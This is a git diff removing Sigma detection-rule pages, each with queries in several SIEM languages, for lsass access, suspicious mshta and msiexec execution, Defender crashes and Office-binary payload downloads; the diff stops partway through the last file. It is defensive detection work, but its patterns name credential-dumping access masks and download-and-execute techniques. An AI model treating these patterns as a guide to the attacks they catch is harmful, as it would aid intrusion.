-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\nSubjectDomainName = {{_source.SubjectDomainName}}\n  SubjectUserName = {{_source.SubjectUserName}}\n      ProcessName = {{_source.ProcessName}}\n        ProcessID = {{_source.ProcessID}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4656" AND ObjectName.keyword:*\\lsass.exe AND AccessMask.keyword:(*0x40* *0x1400* *0x1000* *0x100000* *0x1410* *0x1010* *0x1438* *0x143a* *0x1418* *0x1f0fff* *0x1f1fff* *0x1f2fff* *0x1f3fff*)) OR ((EventID:"4663" AND ObjectName.keyword:*\\lsass.exe AND AccessList.keyword:(*4484* *4416*)) AND (NOT (ProcessName.keyword:(*\\wmiprvse.exe *\\taskmgr.exe *\\procexp64.exe *\\procexp.exe *\\lsm.exe *\\csrss.exe *\\wininit.exe *\\vmtoolsd.exe)))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" ((EventCode="4656" ObjectName="*\\lsass.exe" (AccessMask="*0x40*" OR AccessMask="*0x1400*" OR AccessMask="*0x1000*" OR AccessMask="*0x100000*" OR AccessMask="*0x1410*" OR AccessMask="*0x1010*" OR AccessMask="*0x1438*" OR AccessMask="*0x143a*" OR AccessMask="*0x1418*" OR AccessMask="*0x1f0fff*" OR AccessMask="*0x1f1fff*" OR AccessMask="*0x1f2fff*" OR AccessMask="*0x1f3fff*")) OR ((EventCode="4663" ObjectName="*\\lsass.exe" (AccessList="*4484*" OR AccessList="*4416*")) NOT ((ProcessName="*\\wmiprvse.exe" OR ProcessName="*\\taskmgr.exe" OR ProcessName="*\\procexp64.exe" OR ProcessName="*\\procexp.exe" OR ProcessName="*\\lsm.exe" OR ProcessName="*\\csrss.exe" OR ProcessName="*\\wininit.exe" OR ProcessName="*\\vmtoolsd.exe"))))) | table ComputerName,SubjectDomainName,SubjectUserName,ProcessName,ProcessID
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" ((event_id="4656" ObjectName="*\\lsass.exe" AccessMask IN ["*0x40*", "*0x1400*", "*0x1000*", "*0x100000*", "*0x1410*", "*0x1010*", "*0x1438*", "*0x143a*", "*0x1418*", "*0x1f0fff*", "*0x1f1fff*", "*0x1f2fff*", "*0x1f3fff*"]) OR ((event_id="4663" ObjectName="*\\lsass.exe" AccessList IN ["*4484*", "*4416*"])  -(ProcessName IN ["*\\wmiprvse.exe", "*\\taskmgr.exe", "*\\procexp64.exe", "*\\procexp.exe", "*\\lsm.exe", "*\\csrss.exe", "*\\wininit.exe", "*\\vmtoolsd.exe"]))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*4656)(?=.*.*\lsass\.exe)(?=.*(?:.*.*0x40.*|.*.*0x1400.*|.*.*0x1000.*|.*.*0x100000.*|.*.*0x1410.*|.*.*0x1010.*|.*.*0x1438.*|.*.*0x143a.*|.*.*0x1418.*|.*.*0x1f0fff.*|.*.*0x1f1fff.*|.*.*0x1f2fff.*|.*.*0x1f3fff.*)))|.*(?:.*(?=.*(?:.*(?=.*4663)(?=.*.*\lsass\.exe)(?=.*(?:.*.*4484.*|.*.*4416.*))))(?=.*(?!.*(?:.*(?=.*(?:.*.*\wmiprvse\.exe|.*.*\taskmgr\.exe|.*.*\procexp64\.exe|.*.*\procexp\.exe|.*.*\lsm\.exe|.*.*\csrss\.exe|.*.*\wininit\.exe|.*.*\vmtoolsd\.exe))))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_mshta_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_mshta_execution.md
deleted file mode 100644
index 5c1d7bb..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_mshta_execution.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | MSHTA Suspicious Execution 01       |
-|:-------------------------|:------------------|
-| **Description**          | Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1140: Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1140: Deobfuscate/Decode Files or Information](../Triggers/T1140.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://blog.sevagas.com/?Hacking-around-HTA-files](http://blog.sevagas.com/?Hacking-around-HTA-files)</li><li>[https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356](https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356)</li><li>[https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script](https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script)</li><li>[https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997](https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997)</li></ul>  |
-| **Author**               | Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MSHTA Suspicious Execution 01
-id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
-status: experimental
-description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
-date: 2019/02/22
-modified: 2019/02/22
-author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
-references:
-    - http://blog.sevagas.com/?Hacking-around-HTA-files
-    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
-    - https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
-tags:
-    - attack.defense_evasion
-    - attack.t1140
-logsource:
-    category: process_creation
-    product: windows
-falsepositives: 
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: high
-detection:
-    selection1:
-        Image: '*\mshta.exe'
-        CommandLine: 
-            - '*vbscript*' 
-            - '*.jpg*'
-            - '*.png*'
-            - '*.lnk*'
-            # - '*.chm*'  # could be prone to false positives
-            - '*.xls*'
-            - '*.doc*'
-            - '*.zip*'
-    condition:
-        selection1 
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\mshta.exe" -and ($_.message -match "CommandLine.*.*vbscript.*" -or $_.message -match "CommandLine.*.*.jpg.*" -or $_.message -match "CommandLine.*.*.png.*" -or $_.message -match "CommandLine.*.*.lnk.*" -or $_.message -match "CommandLine.*.*.xls.*" -or $_.message -match "CommandLine.*.*.doc.*" -or $_.message -match "CommandLine.*.*.zip.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\mshta.exe AND winlog.event_data.CommandLine.keyword:(*vbscript* OR *.jpg* OR *.png* OR *.lnk* OR *.xls* OR *.doc* OR *.zip*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cc7abbd0-762b-41e3-8a26-57ad50d2eea3 <<EOF
-{
-  "metadata": {
-    "title": "MSHTA Suspicious Execution 01",
-    "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1140"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\mshta.exe AND winlog.event_data.CommandLine.keyword:(*vbscript* OR *.jpg* OR *.png* OR *.lnk* OR *.xls* OR *.doc* OR *.zip*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\mshta.exe AND winlog.event_data.CommandLine.keyword:(*vbscript* OR *.jpg* OR *.png* OR *.lnk* OR *.xls* OR *.doc* OR *.zip*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MSHTA Suspicious Execution 01'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\mshta.exe AND CommandLine.keyword:(*vbscript* *.jpg* *.png* *.lnk* *.xls* *.doc* *.zip*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\mshta.exe" (CommandLine="*vbscript*" OR CommandLine="*.jpg*" OR CommandLine="*.png*" OR CommandLine="*.lnk*" OR CommandLine="*.xls*" OR CommandLine="*.doc*" OR CommandLine="*.zip*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\mshta.exe" CommandLine IN ["*vbscript*", "*.jpg*", "*.png*", "*.lnk*", "*.xls*", "*.doc*", "*.zip*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\mshta\.exe)(?=.*(?:.*.*vbscript.*|.*.*\.jpg.*|.*.*\.png.*|.*.*\.lnk.*|.*.*\.xls.*|.*.*\.doc.*|.*.*\.zip.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_cwd.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_cwd.md
deleted file mode 100644
index d2941f5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_cwd.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Suspicious MsiExec Directory       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious msiexec process starts in an uncommon directory |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/200_okay_/status/1194765831911215104](https://twitter.com/200_okay_/status/1194765831911215104)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious MsiExec Directory
-id: e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144
-status: experimental
-description: Detects suspicious msiexec process starts in an uncommon directory
-references:
-    - https://twitter.com/200_okay_/status/1194765831911215104
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-author: Florian Roth
-date: 2019/11/14
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\msiexec.exe'
-    filter:
-        Image: 
-            - 'C:\Windows\System32\\*'
-            - 'C:\Windows\SysWOW64\\*'
-            - 'C:\Windows\WinSxS\\*' 
-    condition: selection and not filter
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\msiexec.exe" -and  -not (($_.message -match "Image.*C:\\Windows\\System32\\.*" -or $_.message -match "Image.*C:\\Windows\\SysWOW64\\.*" -or $_.message -match "Image.*C:\\Windows\\WinSxS\\.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\msiexec.exe AND (NOT (winlog.event_data.Image.keyword:(C\:\\Windows\\System32\\* OR C\:\\Windows\\SysWOW64\\* OR C\:\\Windows\\WinSxS\\*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious MsiExec Directory",
-    "description": "Detects suspicious msiexec process starts in an uncommon directory",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\msiexec.exe AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\msiexec.exe AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious MsiExec Directory'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\msiexec.exe AND (NOT (Image.keyword:(C\:\\Windows\\System32\\* C\:\\Windows\\SysWOW64\\* C\:\\Windows\\WinSxS\\*))))
-```
-
-
-### splunk
-    
-```
-(Image="*\\msiexec.exe" NOT ((Image="C:\\Windows\\System32\\*" OR Image="C:\\Windows\\SysWOW64\\*" OR Image="C:\\Windows\\WinSxS\\*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\msiexec.exe"  -(Image IN ["C:\\Windows\\System32\\*", "C:\\Windows\\SysWOW64\\*", "C:\\Windows\\WinSxS\\*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\msiexec\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*C:\Windows\System32\\.*|.*C:\Windows\SysWOW64\\.*|.*C:\Windows\WinSxS\\.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_web_install.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_web_install.md
deleted file mode 100644
index 5b2d5b3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msiexec_web_install.md
+++ /dev/null
@@ -1,172 +0,0 @@
-| Title                    | MsiExec Web Install       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious msiexec process starts with web addreses as parameter |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/](https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MsiExec Web Install
-id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
-status: experimental
-description: Detects suspicious msiexec process starts with web addreses as parameter
-references:
-    - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
-tags:
-    - attack.defense_evasion
-author: Florian Roth
-date: 2018/02/09
-modified: 2012/12/11
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* msiexec*://*'
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* msiexec.*://.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ msiexec*\:\/\/*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f7b5f842-a6af-4da5-9e95-e32478f3cd2f <<EOF
-{
-  "metadata": {
-    "title": "MsiExec Web Install",
-    "description": "Detects suspicious msiexec process starts with web addreses as parameter",
-    "tags": [
-      "attack.defense_evasion"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ msiexec*\\:\\/\\/*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ msiexec*\\:\\/\\/*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MsiExec Web Install'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* msiexec*\:\/\/*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* msiexec*://*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* msiexec*://*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* msiexec.*://.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msmpeng_crash.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_msmpeng_crash.md
deleted file mode 100644
index e297a76..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msmpeng_crash.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Microsoft Malware Protection Engine Crash       |
-|:-------------------------|:------------------|
-| **Description**          | This rule detects a suspicious crash of the Microsoft Malware Protection Engine |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1089: Disabling Security Tools](https://attack.mitre.org/techniques/T1089)</li><li>[T1211: Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>MsMpEng.exe can crash when C:\ is full</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5](https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5)</li><li>[https://technet.microsoft.com/en-us/library/security/4022344](https://technet.microsoft.com/en-us/library/security/4022344)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1562.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Microsoft Malware Protection Engine Crash
-id: 6c82cf5c-090d-4d57-9188-533577631108
-description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
-tags:
-    - attack.defense_evasion
-    - attack.t1089
-    - attack.t1211
-    - attack.t1562.001
-status: experimental
-date: 2017/05/09
-references:
-    - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
-    - https://technet.microsoft.com/en-us/library/security/4022344
-author: Florian Roth
-logsource:
-    product: windows
-    service: application
-detection:
-    selection1:
-        Source: 'Application Error'
-        EventID: 1000
-    selection2:
-        Source: 'Windows Error Reporting'
-        EventID: 1001
-    keywords:
-        Message:
-            - '*MsMpEng.exe*'
-            - '*mpengine.dll*'
-    condition: 1 of selection* and all of keywords
-falsepositives:
-    - MsMpEng.exe can crash when C:\ is full
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Application | where {((($_.message -match "Source.*Application Error" -and $_.ID -eq "1000") -or ($_.message -match "Source.*Windows Error Reporting" -and $_.ID -eq "1001")) -and ($_.message -match "Message.*.*MsMpEng.exe.*" -or $_.message -match "Message.*.*mpengine.dll.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Application" AND ((winlog.event_data.Source:"Application\ Error" AND winlog.event_id:"1000") OR (winlog.event_data.Source:"Windows\ Error\ Reporting" AND winlog.event_id:"1001")) AND Message.keyword:(*MsMpEng.exe* OR *mpengine.dll*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6c82cf5c-090d-4d57-9188-533577631108 <<EOF
-{
-  "metadata": {
-    "title": "Microsoft Malware Protection Engine Crash",
-    "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1089",
-      "attack.t1211",
-      "attack.t1562.001"
-    ],
-    "query": "(winlog.channel:\"Application\" AND ((winlog.event_data.Source:\"Application\\ Error\" AND winlog.event_id:\"1000\") OR (winlog.event_data.Source:\"Windows\\ Error\\ Reporting\" AND winlog.event_id:\"1001\")) AND Message.keyword:(*MsMpEng.exe* OR *mpengine.dll*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Application\" AND ((winlog.event_data.Source:\"Application\\ Error\" AND winlog.event_id:\"1000\") OR (winlog.event_data.Source:\"Windows\\ Error\\ Reporting\" AND winlog.event_id:\"1001\")) AND Message.keyword:(*MsMpEng.exe* OR *mpengine.dll*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Microsoft Malware Protection Engine Crash'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(((Source:"Application Error" AND EventID:"1000") OR (Source:"Windows Error Reporting" AND EventID:"1001")) AND Message.keyword:(*MsMpEng.exe* *mpengine.dll*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Application" ((Source="Application Error" EventCode="1000") OR (Source="Windows Error Reporting" EventCode="1001")) (Message="*MsMpEng.exe*" OR Message="*mpengine.dll*"))
-```
-
-
-### logpoint
-    
-```
-(((Source="Application Error" event_id="1000") OR (Source="Windows Error Reporting" event_id="1001")) Message IN ["*MsMpEng.exe*", "*mpengine.dll*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*(?:.*(?=.*Application Error)(?=.*1000))|.*(?:.*(?=.*Windows Error Reporting)(?=.*1001)))))(?=.*(?:.*.*MsMpEng\.exe.*|.*.*mpengine\.dll.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msoffice.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_msoffice.md
deleted file mode 100644
index 52015c1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_msoffice.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Malicious Payload Download via Office Binaries       |
-|:-------------------------|:------------------|
-| **Description**          | Downloads payload from remote server |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1105: Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1105: Ingress Tool Transfer](../Triggers/T1105.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml)</li><li>[https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)</li><li>[Reegun J (OCBC Bank)](Reegun J (OCBC Bank))</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Malicious Payload Download via Office Binaries
-id: 0c79148b-118e-472b-bdb7-9b57b444cc19
-status: experimental
-description: Downloads payload from remote server
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml
-    - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
-    - Reegun J (OCBC Bank)
-author: Beyu Denis, oscd.community
-date: 2019/10/26
-modified: 2019/11/04
-tags:
-    - attack.command_and_control
-    - attack.t1105
-level: high
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\powerpnt.exe'
